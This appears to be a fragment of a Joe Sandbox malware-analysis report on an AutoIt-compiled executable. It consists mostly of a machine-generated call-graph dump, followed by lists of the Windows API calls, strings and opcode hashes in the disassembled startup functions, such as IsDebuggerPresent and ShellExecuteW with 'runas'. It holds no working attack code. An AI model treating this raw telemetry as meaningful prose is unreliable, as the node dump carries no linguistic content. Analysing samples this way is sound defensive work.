99585->99591 99606 7cd5cb 59 API calls Mailbox 99585->99606 99587 77aec2 Mailbox 99600 79052f 59 API calls Mailbox 99587->99600 99591->99591 99597 77c72e Mailbox 99595->99597 99596 77ae08 99596->99569 99596->99572 99597->99596 99607 7ce0aa 59 API calls 99597->99607 99599->99587 99602 7842e8 99601->99602 99603 7842d9 99601->99603 99602->99603 99604 7842ed CloseHandle 99602->99604 99603->99574 99604->99603 99605->99580 99606->99585 99607->99597 99608 7ae463 99620 77373a 99608->99620 99610 7ae479 99611 7ae4fa 99610->99611 99612 7ae48f 99610->99612 99614 77b020 278 API calls 99611->99614 99629 775376 60 API calls 99612->99629 99619 7ae4ee Mailbox 99614->99619 99616 7ae4ce 99616->99619 99630 7d890a 59 API calls Mailbox 99616->99630 99617 7af046 Mailbox 99619->99617 99631 7da48d 89 API calls 4 library calls 99619->99631 99621 773746 99620->99621 99622 773758 99620->99622 99623 77523c 59 API calls 99621->99623 99624 773787 99622->99624 99625 77375e 99622->99625 99628 773750 99623->99628 99627 77523c 59 API calls 99624->99627 99626 790fe6 Mailbox 59 API calls 99625->99626 99626->99628 99627->99628 99628->99610 99629->99616 99630->99619 99631->99617 99632 7738ce 99633 7738d8 99632->99633 99635 7738f9 99632->99635 99634 773b31 59 API calls 99633->99634 99637 7738e8 99634->99637 99639 7ad352 99635->99639 99641 7c6d17 59 API calls 99635->99641 99638 773b31 59 API calls 99637->99638 99640 7738f8 99638->99640 99641->99635 99642 797e83 99643 797e8f __write 99642->99643 99679 79a038 GetStartupInfoW 99643->99679 99645 797e94 99681 798dac GetProcessHeap 99645->99681 99647 797eec 99648 797ef7 99647->99648 99767 797fd3 58 API calls 3 library calls 99647->99767 99682 799d16 99648->99682 99651 797efd 99652 797f08 __RTC_Initialize 99651->99652 99768 797fd3 58 API calls 3 library calls 99651->99768 99703 79d802 99652->99703 99655 797f17 99656 797f23 GetCommandLineW 99655->99656 99769 797fd3 58 API calls 3 library calls 99655->99769 99722 7a5153 GetEnvironmentStringsW 99656->99722 99660 797f22 99660->99656 99662 797f3d 99663 797f48 99662->99663 99770 7932e5 58 API calls 3 library calls 99662->99770 99732 7a4f88 99663->99732 99666 797f4e 99669 797f59 99666->99669 99771 7932e5 58 API calls 3 library calls 99666->99771 99746 79331f 99669->99746 99670 797f61 99671 797f6c __wwincmdln 99670->99671 99772 7932e5 58 API calls 3 library calls 99670->99772 99752 785f8b 99671->99752 99674 797f80 99675 797f8f 99674->99675 99764 793588 99674->99764 99773 793310 58 API calls _doexit 99675->99773 99678 797f94 __write 99680 79a04e 99679->99680 99680->99645 99681->99647 99774 7933b7 36 API calls 2 library calls 99682->99774 99684 799d1b 99775 799f6c InitializeCriticalSectionAndSpinCount __mtinitlocknum 99684->99775 99686 799d20 99687 799d24 99686->99687 99777 799fba TlsAlloc 99686->99777 99776 799d8c 61 API calls 2 library calls 99687->99776 99690 799d29 99690->99651 99691 799d36 99691->99687 99692 799d41 99691->99692 99778 798a05 99692->99778 99695 799d83 99786 799d8c 61 API calls 2 library calls 99695->99786 99698 799d88 99698->99651 99699 799d62 99699->99695 99700 799d68 99699->99700 99785 799c63 58 API calls 4 library calls 99700->99785 99702 799d70 GetCurrentThreadId 99702->99651 99704 79d80e __write 99703->99704 99705 799e3b __lock 58 API calls 99704->99705 99706 79d815 99705->99706 99707 798a05 __calloc_crt 58 API calls 99706->99707 99709 79d826 99707->99709 99708 79d891 GetStartupInfoW 99712 79d9d5 99708->99712 99716 79d8a6 99708->99716 99709->99708 99710 79d831 __write @_EH4_CallFilterFunc@8 99709->99710 99710->99655 99711 79da9d 99800 79daad LeaveCriticalSection _doexit 99711->99800 99712->99711 99715 79da22 GetStdHandle 99712->99715 99718 79da35 GetFileType 99712->99718 99799 79a05b InitializeCriticalSectionAndSpinCount 99712->99799 99714 798a05 __calloc_crt 58 API calls 99714->99716 99715->99712 99716->99712 99716->99714 99717 79d8f4 99716->99717 99717->99712 99719 79d928 GetFileType 99717->99719 99798 79a05b InitializeCriticalSectionAndSpinCount 99717->99798 99718->99712 99719->99717 99723 797f33 99722->99723 99724 7a5164 99722->99724 99728 7a4d4b GetModuleFileNameW 99723->99728 99801 798a4d 58 API calls 2 library calls 99724->99801 99726 7a518a _memmove 99727 7a51a0 FreeEnvironmentStringsW 99726->99727 99727->99723 99729 7a4d7f _wparse_cmdline 99728->99729 99731 7a4dbf _wparse_cmdline 99729->99731 99802 798a4d 58 API calls 2 library calls 99729->99802 99731->99662 99733 7a4fa1 __wsetenvp 99732->99733 99737 7a4f99 99732->99737 99734 798a05 __calloc_crt 58 API calls 99733->99734 99742 7a4fca __wsetenvp 99734->99742 99735 7a5021 99736 792f85 _free 58 API calls 99735->99736 99736->99737 99737->99666 99738 798a05 __calloc_crt 58 API calls 99738->99742 99739 7a5046 99740 792f85 _free 58 API calls 99739->99740 99740->99737 99742->99735 99742->99737 99742->99738 99742->99739 99743 7a505d 99742->99743 99803 7a4837 58 API calls __write 99742->99803 99804 798ff6 IsProcessorFeaturePresent 99743->99804 99745 7a5069 99745->99666 99747 79332b __IsNonwritableInCurrentImage 99746->99747 99827 79a701 99747->99827 99749 793349 __initterm_e 99750 792f70 __cinit 67 API calls 99749->99750 99751 793368 _doexit __IsNonwritableInCurrentImage 99749->99751 99750->99751 99751->99670 99753 785fa5 99752->99753 99763 786044 99752->99763 99754 785fdf IsThemeActive 99753->99754 99830 79359c 99754->99830 99758 78600b 99842 785f00 SystemParametersInfoW SystemParametersInfoW 99758->99842 99760 786017 99843 785240 99760->99843 99762 78601f SystemParametersInfoW 99762->99763 99763->99674 100832 793459 99764->100832 99766 793597 99766->99675 99767->99648 99768->99652 99769->99660 99773->99678 99774->99684 99775->99686 99776->99690 99777->99691 99780 798a0c 99778->99780 99781 798a47 99780->99781 99783 798a2a 99780->99783 99787 7a5426 99780->99787 99781->99695 99784 79a016 TlsSetValue 99781->99784 99783->99780 99783->99781 99795 79a362 Sleep 99783->99795 99784->99699 99785->99702 99786->99698 99788 7a5431 99787->99788 99794 7a544c 99787->99794 99789 7a543d 99788->99789 99788->99794 99796 798d58 58 API calls __getptd_noexit 99789->99796 99791 7a545c RtlAllocateHeap 99792 7a5442 99791->99792 99791->99794 99792->99780 99794->99791 99794->99792 99797 7935d1 DecodePointer 99794->99797 99795->99783 99796->99792 99797->99794 99798->99717 99799->99712 99800->99710 99801->99726 99802->99731 99803->99742 99805 799001 99804->99805 99810 798e89 99805->99810 99809 79901c 99809->99745 99811 798ea3 _memset __call_reportfault 99810->99811 99812 798ec3 IsDebuggerPresent 99811->99812 99818 79a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99812->99818 99815 798f87 __call_reportfault 99819 79c826 99815->99819 99816 798faa 99817 79a370 GetCurrentProcess TerminateProcess 99816->99817 99817->99809 99818->99815 99820 79c82e 99819->99820 99821 79c830 IsProcessorFeaturePresent 99819->99821 99820->99816 99823 7a5b3a 99821->99823 99826 7a5ae9 5 API calls 2 library calls 99823->99826 99825 7a5c1d 99825->99816 99826->99825 99828 79a704 EncodePointer 99827->99828 99828->99828 99829 79a71e 99828->99829 99829->99749 99831 799e3b __lock 58 API calls 99830->99831 99832 7935a7 DecodePointer EncodePointer 99831->99832 99895 799fa5 LeaveCriticalSection 99832->99895 99834 786004 99835 793604 99834->99835 99836 793628 99835->99836 99837 79360e 99835->99837 99836->99758 99837->99836 99896 798d58 58 API calls __getptd_noexit 99837->99896 99839 793618 99897 798fe6 9 API calls __write 99839->99897 99841 793623 99841->99758 99842->99760 99844 78524d __write_nolock 99843->99844 99845 781207 59 API calls 99844->99845 99846 785258 GetCurrentDirectoryW 99845->99846 99898 784ec8 99846->99898 99848 78527e IsDebuggerPresent 99849 78528c 99848->99849 99850 7c0b21 MessageBoxA 99848->99850 99851 7c0b39 99849->99851 99852 7852a0 99849->99852 99850->99851 100006 78314d 59 API calls Mailbox 99851->100006 99966 7831bf 99852->99966 99856 7c0b49 99862 7c0b5f SetCurrentDirectoryW 99856->99862 99864 78536c Mailbox 99862->99864 99864->99762 99895->99834 99896->99839 99897->99841 99899 781207 59 API calls 99898->99899 99900 784ede 99899->99900 100009 785420 99900->100009 99902 784efc 99903 7819e1 59 API calls 99902->99903 99904 784f10 99903->99904 99905 781c9c 59 API calls 99904->99905 99906 784f1b 99905->99906 99907 77477a 59 API calls 99906->99907 99908 784f27 99907->99908 99909 781a36 59 API calls 99908->99909 99910 784f34 99909->99910 99911 7739be 68 API calls 99910->99911 99912 784f44 Mailbox 99911->99912 99913 781a36 59 API calls 99912->99913 99914 784f68 99913->99914 99915 7739be 68 API calls 99914->99915 99916 784f77 Mailbox 99915->99916 99917 781207 59 API calls 99916->99917 99918 784f94 99917->99918 100023 7855bc 99918->100023 99921 79312d _W_store_winword 60 API calls 99922 784fae 99921->99922 99923 784fb8 99922->99923 99924 7c0a54 99922->99924 99925 79312d _W_store_winword 60 API calls 99923->99925 99926 7855bc 59 API calls 99924->99926 99928 784fc3 99925->99928 99927 7c0a68 99926->99927 99930 7855bc 59 API calls 99927->99930 99928->99927 99929 784fcd 99928->99929 99931 79312d _W_store_winword 60 API calls 99929->99931 99932 7c0a84 99930->99932 99933 784fd8 99931->99933 99935 7900cf 61 API calls 99932->99935 99933->99932 99934 784fe2 99933->99934 99936 79312d _W_store_winword 60 API calls 99934->99936 99937 7c0aa7 99935->99937 99938 784fed 99936->99938 99939 7855bc 59 API calls 99937->99939 99940 7c0ad0 99938->99940 99941 784ff7 99938->99941 99943 7c0ab3 99939->99943 99942 7855bc 59 API calls 99940->99942 99944 78501b 99941->99944 99947 781c9c 59 API calls 99941->99947 99945 7c0aee 99942->99945 99946 781c9c 59 API calls 99943->99946 99948 7747be 59 API calls 99944->99948 99949 781c9c 59 API calls 99945->99949 99950 7c0ac1 99946->99950 99951 78500e 99947->99951 99952 78502a 99948->99952 99953 7c0afc 99949->99953 99954 7855bc 59 API calls 99950->99954 99955 7855bc 59 API calls 99951->99955 99956 774540 59 API calls 99952->99956 99957 7855bc 59 API calls 99953->99957 99954->99940 99955->99944 99958 785038 99956->99958 99959 7c0b0b 99957->99959 99960 7743d0 59 API calls 99958->99960 99959->99959 99963 785055 99960->99963 99961 77477a 59 API calls 99961->99963 99962 7743d0 59 API calls 99962->99963 99963->99961 99963->99962 99964 7855bc 59 API calls 99963->99964 99965 78509b Mailbox 99963->99965 99964->99963 99965->99848 99967 7831cc __write_nolock 99966->99967 99968 7c0314 _memset 99967->99968 99969 7831e5 99967->99969 99971 7c0330 GetOpenFileNameW 99968->99971 99970 790284 60 API calls 99969->99970 99972 7831ee 99970->99972 99974 7c037f 99971->99974 100029 7909c5 99972->100029 99976 781821 59 API calls 99974->99976 99978 7c0394 99976->99978 99978->99978 99979 783203 100047 78278a 99979->100047 100006->99856 100010 78542d __write_nolock 100009->100010 100011 781821 59 API calls 100010->100011 100016 785590 Mailbox 100010->100016 100013 78545f 100011->100013 100012 781609 59 API calls 100012->100013 100013->100012 100022 785495 Mailbox 100013->100022 100014 781609 59 API calls 100014->100022 100015 785563 100015->100016 100017 781a36 59 API calls 100015->100017 100016->99902 100018 785584 100017->100018 100020 784c94 59 API calls 100018->100020 100019 781a36 59 API calls 100019->100022 100020->100016 100021 784c94 59 API calls 100021->100022 100022->100014 100022->100015 100022->100016 100022->100019 100022->100021 100024 7855df 100023->100024 100025 7855c6 100023->100025 100027 781821 59 API calls 100024->100027 100026 781c9c 59 API calls 100025->100026 100028 784fa0 100026->100028 100027->100028 100028->99921 100030 7a1b70 __write_nolock 100029->100030 100031 7909d2 GetLongPathNameW 100030->100031 100032 781821 59 API calls 100031->100032 100033 7831f7 100032->100033 100034 782f3d 100033->100034 100035 781207 59 API calls 100034->100035 100036 782f4f 100035->100036 100037 790284 60 API calls 100036->100037 100038 782f5a 100037->100038 100039 7c0177 100038->100039 100040 782f65 100038->100040 100044 7c0191 100039->100044 100087 78151f 61 API calls 100039->100087 100042 784c94 59 API calls 100040->100042 100043 782f71 100042->100043 100081 771307 100043->100081 100046 782f84 Mailbox 100046->99979 100088 7849c2 100047->100088 100050 7bf8d6 100205 7d9b16 100050->100205 100052 7849c2 136 API calls 100054 7827c3 100052->100054 100054->100050 100057 7827cb 100054->100057 100060 7bf8f3 100057->100060 100061 7827d7 100057->100061 100082 771319 100081->100082 100086 771338 _memmove 100081->100086 100084 790fe6 Mailbox 59 API calls 100082->100084 100083 790fe6 Mailbox 59 API calls 100085 77134f 100083->100085 100084->100086 100085->100046 100086->100083 100087->100039 100272 784b29 100088->100272 100093 7849ed LoadLibraryExW 100282 784ade 100093->100282 100094 7c08bb 100095 784a2f 84 API calls 100094->100095 100097 7c08c2 100095->100097 100099 784ade 3 API calls 100097->100099 100101 7c08ca 100099->100101 100308 784ab2 100101->100308 100102 784a14 100102->100101 100103 784a20 100102->100103 100105 784a2f 84 API calls 100103->100105 100106 7827af 100105->100106 100106->100050 100106->100052 100109 7c08f1 100316 784a6e 100109->100316 100206 784a8c 85 API calls 100205->100206 100207 7d9b85 100206->100207 100321 784b77 100272->100321 100275 784b50 100277 7849d4 100275->100277 100278 784b60 FreeLibrary 100275->100278 100276 784b77 2 API calls 100276->100275 100279 79547b 100277->100279 100278->100277 100325 795490 100279->100325 100281 7849e1 100281->100093 100281->100094 100406 784baa 100282->100406 100285 784baa 2 API calls 100288 784b03 100285->100288 100286 784a05 100289 7848b0 100286->100289 100287 784b15 FreeLibrary 100287->100286 100288->100286 100288->100287 100290 790fe6 Mailbox 59 API calls 100289->100290 100291 7848c5 100290->100291 100292 78433f 59 API calls 100291->100292 100293 7848d1 _memmove 100292->100293 100294 78490c 100293->100294 100295 7c080a 100293->100295 100296 784a6e 69 API calls 100294->100296 100297 7c0817 100295->100297 100415 7d9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100295->100415 100307 784915 100296->100307 100416 7d9f5e 95 API calls 100297->100416 100300 784ab2 74 API calls 100300->100307 100302 7c0859 100410 784a8c 100302->100410 100304 784a8c 85 API calls 100304->100307 100306 7849a0 100306->100102 100307->100300 100307->100302 100307->100304 100307->100306 100309 7c0945 100308->100309 100310 784ac4 100308->100310 100522 795802 100310->100522 100313 7d96c4 100647 7d951a 100313->100647 100315 7d96da 100315->100109 100317 7c0908 100316->100317 100318 784a7d 100316->100318 100652 795e80 100318->100652 100322 784b44 100321->100322 100323 784b80 LoadLibraryA 100321->100323 100322->100275 100322->100276 100323->100322 100324 784b91 GetProcAddress 100323->100324 100324->100322 100326 79549c __write 100325->100326 100327 7954af 100326->100327 100329 7954e0 100326->100329 100374 798d58 58 API calls __getptd_noexit 100327->100374 100344 7a0718 100329->100344 100330 7954b4 100375 798fe6 9 API calls __write 100330->100375 100333 7954e5 100334 7954fb 100333->100334 100335 7954ee 100333->100335 100337 795525 100334->100337 100338 795505 100334->100338 100376 798d58 58 API calls __getptd_noexit 100335->100376 100359 7a0837 100337->100359 100377 798d58 58 API calls __getptd_noexit 100338->100377 100342 7954bf __write @_EH4_CallFilterFunc@8 100342->100281 100345 7a0724 __write 100344->100345 100346 799e3b __lock 58 API calls 100345->100346 100347 7a0732 100346->100347 100348 7a07ad 100347->100348 100354 799ec3 __mtinitlocknum 58 API calls 100347->100354 100357 7a07a6 100347->100357 100382 796e7d 59 API calls __lock 100347->100382 100383 796ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100347->100383 100384 798a4d 58 API calls 2 library calls 100348->100384 100351 7a07b4 100351->100357 100385 79a05b InitializeCriticalSectionAndSpinCount 100351->100385 100352 7a0823 __write 100352->100333 100354->100347 100356 7a07da EnterCriticalSection 100356->100357 100379 7a082e 100357->100379 100367 7a0857 __wopenfile 100359->100367 100360 7a0871 100390 798d58 58 API calls __getptd_noexit 100360->100390 100362 7a0876 100391 798fe6 9 API calls __write 100362->100391 100364 7a0a8f 100387 7a87d1 100364->100387 100365 795530 100378 795552 LeaveCriticalSection LeaveCriticalSection _fseek 100365->100378 100367->100360 100373 7a0a2c 100367->100373 100392 7939fb 60 API calls 2 library calls 100367->100392 100369 7a0a25 100369->100373 100393 7939fb 60 API calls 2 library calls 100369->100393 100371 7a0a44 100371->100373 100394 7939fb 60 API calls 2 library calls 100371->100394 100373->100360 100373->100364 100374->100330 100375->100342 100376->100342 100377->100342 100378->100342 100386 799fa5 LeaveCriticalSection 100379->100386 100381 7a0835 100381->100352 100382->100347 100383->100347 100384->100351 100385->100356 100386->100381 100395 7a7fb5 100387->100395 100389 7a87ea 100389->100365 100390->100362 100391->100365 100392->100369 100393->100371 100394->100373 100396 7a7fc1 __write 100395->100396 100397 7a7fd7 100396->100397 100400 7a800d 100396->100400 100398 798d58 __write 58 API calls 100397->100398 100399 7a7fdc 100398->100399 100401 798fe6 __write 9 API calls 100399->100401 100402 7a807e __wsopen_nolock 109 API calls 100400->100402 100405 7a7fe6 __write 100401->100405 100403 7a8029 100402->100403 100404 7a8052 __wsopen_helper LeaveCriticalSection 100403->100404 100404->100405 100405->100389 100407 784af7 100406->100407 100408 784bb3 LoadLibraryA 100406->100408 100407->100285 100407->100288 100408->100407 100409 784bc4 GetProcAddress 100408->100409 100409->100407 100411 784a9b 100410->100411 100412 7c0923 100410->100412 100417 795a6d 100411->100417 100415->100297 100416->100307 100421 795a79 __write 100417->100421 100418 795a8b 100448 798d58 58 API calls __getptd_noexit 100418->100448 100420 795ab1 100430 796e3e 100420->100430 100421->100418 100421->100420 100422 795a90 100449 798fe6 9 API calls __write 100422->100449 100429 795a9b __write 100431 796e4e 100430->100431 100432 796e70 EnterCriticalSection 100430->100432 100431->100432 100433 796e56 100431->100433 100434 795ab7 100432->100434 100435 799e3b __lock 58 API calls 100433->100435 100436 7959de 100434->100436 100435->100434 100448->100422 100449->100429 100525 79581d 100522->100525 100524 784ad5 100524->100313 100526 795829 __write 100525->100526 100527 795864 __write 100526->100527 100528 79586c 100526->100528 100529 79583f _memset 100526->100529 100527->100524 100530 796e3e __lock_file 59 API calls 100528->100530 100552 798d58 58 API calls __getptd_noexit 100529->100552 100532 795872 100530->100532 100538 79563d 100532->100538 100533 795859 100553 798fe6 9 API calls __write 100533->100553 100542 795658 _memset 100538->100542 100544 795673 100538->100544 100539 795663 100643 798d58 58 API calls __getptd_noexit 100539->100643 100541 795668 100644 798fe6 9 API calls __write 100541->100644 100542->100539 100542->100544 100549 7956b3 100542->100549 100554 7958a6 LeaveCriticalSection LeaveCriticalSection _fseek 100544->100554 100546 7957c4 _memset 100646 798d58 58 API calls __getptd_noexit 100546->100646 100547 794906 __fclose_nolock 58 API calls 100547->100549 100549->100544 100549->100546 100549->100547 100555 7a108b 100549->100555 100623 7a0dd7 100549->100623 100645 7a0ef8 58 API calls 3 library calls 100549->100645 100552->100533 100553->100527 100554->100527 100556 7a10ac 100555->100556 100557 7a10c3 100555->100557 100558 798d24 __write 58 API calls 100556->100558 100559 7a17fb 100557->100559 100564 7a10fd 100557->100564 100561 7a10b1 100558->100561 100560 798d24 __write 58 API calls 100559->100560 100562 7a1800 100560->100562 100563 798d58 __write 58 API calls 100561->100563 100565 798d58 __write 58 API calls 100562->100565 100569 7a10b8 100563->100569 100566 7a1105 100564->100566 100572 7a111c 100564->100572 100568 7a1111 100565->100568 100567 798d24 __write 58 API calls 100566->100567 100570 7a110a 100567->100570 100569->100549 100574 798d58 __write 58 API calls 100570->100574 100572->100569 100573 7a1131 100572->100573 100576 7a114b 100572->100576 100577 7a1169 100572->100577 100575 798d24 __write 58 API calls 100573->100575 100574->100568 100575->100570 100576->100573 100578 7a1156 100576->100578 100579 798a4d __malloc_crt 58 API calls 100577->100579 100581 7a5e9b __read_nolock 58 API calls 100578->100581 100580 7a1179 100579->100580 100583 7a1181 100580->100583 100584 7a126a 100581->100584 100624 7a0de2 100623->100624 100628 7a0df7 100623->100628 100625 798d58 __write 58 API calls 100624->100625 100626 7a0de7 100625->100626 100627 798fe6 __write 9 API calls 100626->100627 100635 7a0df2 100627->100635 100629 7a0e2c 100628->100629 100630 7a6214 __getbuf 58 API calls 100628->100630 100628->100635 100631 794906 __fclose_nolock 58 API calls 100629->100631 100630->100629 100632 7a0e40 100631->100632 100633 7a0f77 __read 72 API calls 100632->100633 100634 7a0e47 100633->100634 100634->100635 100635->100549 100643->100541 100644->100544 100645->100549 100646->100541 100650 79542a GetSystemTimeAsFileTime 100647->100650 100649 7d9529 100649->100315 100651 795458 __aulldiv 100650->100651 100651->100649 100653 795e8c __write 100652->100653 100833 793465 __write 100832->100833 100834 799e3b __lock 51 API calls 100833->100834 100835 79346c 100834->100835 100836 793525 _doexit 100835->100836 100837 79349a DecodePointer 100835->100837 100852 793573 100836->100852 100837->100836 100839 7934b1 DecodePointer 100837->100839 100845 7934c1 100839->100845 100841 793582 __write 100841->99766 100843 7934ce EncodePointer 100843->100845 100844 79356a 100846 7932cf __mtinitlocknum 3 API calls 100844->100846 100845->100836 100845->100843 100848 7934de DecodePointer EncodePointer 100845->100848 100847 793573 100846->100847 100851 793580 100847->100851 100857 799fa5 LeaveCriticalSection 100847->100857 100849 7934f0 DecodePointer DecodePointer 100848->100849 100849->100845 100851->99766 100853 793579 100852->100853 100855 793553 100852->100855 100858 799fa5 LeaveCriticalSection 100853->100858 100855->100841 100856 799fa5 LeaveCriticalSection 100855->100856 100856->100844 100857->100851 100858->100855 100859 779a6c 100862 77829c 100859->100862 100861 779a78 100863 7782b4 100862->100863 100865 778308 100862->100865 100863->100865 100866 7753b0 278 API calls 100863->100866 100868 778331 100865->100868 100871 7da48d 89 API calls 4 library calls 100865->100871 100869 7782eb 100866->100869 100867 7b0ed8 100867->100867 100868->100861 100869->100868 100870 77523c 59 API calls 100869->100870 100870->100865 100871->100867 100872 784d83 100873 784dba 100872->100873 100874 784dd8 100873->100874 100875 784e37 100873->100875 100911 784e35 100873->100911 100879 784ead PostQuitMessage 100874->100879 100880 784de5 100874->100880 100877 784e3d 100875->100877 100878 7c09c2 100875->100878 100876 784e1a DefWindowProcW 100902 784e28 100876->100902 100884 784e42 100877->100884 100885 784e65 SetTimer RegisterWindowMessageW 100877->100885 100883 77c460 10 API calls 100878->100883 100879->100902 100881 784df0 100880->100881 100882 7c0a35 100880->100882 100886 784df8 100881->100886 100887 784eb7 100881->100887 100927 7d2cce 97 API calls _memset 100882->100927 100890 7c09e9 100883->100890 100891 784e49 KillTimer 100884->100891 100892 7c0965 100884->100892 100888 784e8e CreatePopupMenu 100885->100888 100885->100902 100893 784e03 100886->100893 100906 7c0a1a 100886->100906 100917 785b29 100887->100917 100888->100902 100894 77c483 278 API calls 100890->100894 100898 785ac3 Shell_NotifyIconW 100891->100898 100896 7c099e MoveWindow 100892->100896 100897 7c096a 100892->100897 100899 784e9b 100893->100899 100900 784e0e 100893->100900 100894->100900 100896->100902 100903 7c098d SetFocus 100897->100903 100904 7c096e 100897->100904 100905 784e5c 100898->100905 100925 785bd7 107 API calls _memset 100899->100925 100900->100876 100914 785ac3 Shell_NotifyIconW 100900->100914 100901 7c0a47 100901->100876 100901->100902 100903->100902 100904->100900 100908 7c0977 100904->100908 100924 7734e4 DeleteObject DestroyWindow Mailbox 100905->100924 100906->100876 100926 7c8854 59 API calls Mailbox 100906->100926 100913 77c460 10 API calls 100908->100913 100911->100876 100912 784eab 100912->100902 100913->100902 100915 7c0a0e 100914->100915 100916 7859d3 94 API calls 100915->100916 100916->100911 100918 785b40 _memset 100917->100918 100919 785bc2 100917->100919 100920 7856f8 87 API calls 100918->100920 100919->100902 100922 785b67 100920->100922 100921 785bab KillTimer SetTimer 100921->100919 100922->100921 100923 7c0d6e Shell_NotifyIconW 100922->100923 100923->100921 100924->100902 100925->100912 100926->100911 100927->100901 100928 779a88 100931 7786e0 100928->100931 100932 7786fd 100931->100932 100933 7b0ff8 100932->100933 100934 7b0fad 100932->100934 100959 778724 100932->100959 100966 7eaad0 278 API calls __cinit 100933->100966 100937 7b0fb5 100934->100937 100941 7b0fc2 100934->100941 100934->100959 100935 775278 59 API calls 100935->100959 100964 7eb0e4 278 API calls 100937->100964 100938 792f70 __cinit 67 API calls 100938->100959 100955 77898d 100941->100955 100965 7eb58c 278 API calls 3 library calls 100941->100965 100943 773c30 68 API calls 100943->100959 100944 7b1289 100944->100944 100945 7b11af 100968 7eae3b 89 API calls 100945->100968 100948 778a17 100949 7739be 68 API calls 100949->100959 100952 77523c 59 API calls 100952->100959 100954 773f42 68 API calls 100954->100959 100955->100948 100969 7da48d 89 API calls 4 library calls 100955->100969 100956 7753b0 278 API calls 100956->100959 100957 781c9c 59 API calls 100957->100959 100959->100935 100959->100938 100959->100943 100959->100945 100959->100948 100959->100949 100959->100952 100959->100954 100959->100955 100959->100956 100959->100957 100960 773938 68 API calls 100959->100960 100961 77855e 278 API calls 100959->100961 100962 7784e2 89 API calls 100959->100962 100963 77835f 278 API calls 100959->100963 100967 7c73ab 59 API calls 100959->100967 100960->100959 100961->100959 100962->100959 100963->100959 100964->100941 100965->100955 100966->100959 100967->100959 100968->100955 100969->100944
                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078526C
                                                    • IsDebuggerPresent.KERNEL32 ref: 0078527E
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 007852E6
                                                      • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                      • Part of subcall function 0077BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0077BC07
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00785366
                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 007C0B2E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007C0B66
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00826D10), ref: 007C0BE9
                                                    • ShellExecuteW.SHELL32(00000000), ref: 007C0BF0
                                                      • Part of subcall function 0078514C: GetSysColorBrush.USER32(0000000F), ref: 00785156
                                                      • Part of subcall function 0078514C: LoadCursorW.USER32(00000000,00007F00), ref: 00785165
                                                      • Part of subcall function 0078514C: LoadIconW.USER32(00000063), ref: 0078517C
                                                      • Part of subcall function 0078514C: LoadIconW.USER32(000000A4), ref: 0078518E
                                                      • Part of subcall function 0078514C: LoadIconW.USER32(000000A2), ref: 007851A0
                                                      • Part of subcall function 0078514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007851C6
                                                      • Part of subcall function 0078514C: RegisterClassExW.USER32(?), ref: 0078521C
                                                      • Part of subcall function 007850DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00785109
                                                      • Part of subcall function 007850DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0078512A
                                                      • Part of subcall function 007850DB: ShowWindow.USER32(00000000), ref: 0078513E
                                                      • Part of subcall function 007850DB: ShowWindow.USER32(00000000), ref: 00785147
                                                      • Part of subcall function 007859D3: _memset.LIBCMT ref: 007859F9
                                                      • Part of subcall function 007859D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00785A9E
                                                    Strings
                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 007C0B28
                                                    • runas, xrefs: 007C0BE4
                                                    • AutoIt, xrefs: 007C0B23
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                    • API String ID: 529118366-2030392706
                                                    • Opcode ID: 833efa50b1b3335e877440b668ca58eda1a230d050aaef767ef53ff0202f381b
                                                    • Instruction ID: 61dd8488185bbfc0ae55466bd263fc3d1c5def3d208957b4d1b7e0918c93dba9
                                                    • Opcode Fuzzy Hash: 833efa50b1b3335e877440b668ca58eda1a230d050aaef767ef53ff0202f381b
                                                    • Instruction Fuzzy Hash: 6F514A7098424CEACF21FBB4DC0AEEE7B79FF45340F1040A9F452A2262CA7C9945CB61
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00785D40
                                                      • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                    • GetCurrentProcess.KERNEL32(?,00800A18,00000000,00000000,?), ref: 00785E07
                                                    • IsWow64Process.KERNEL32(00000000), ref: 00785E0E
                                                    • GetNativeSystemInfo.KERNEL32(00000000), ref: 00785E54
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00785E5F
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00785E90
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00785E9C
                                                    Memory Dump Source
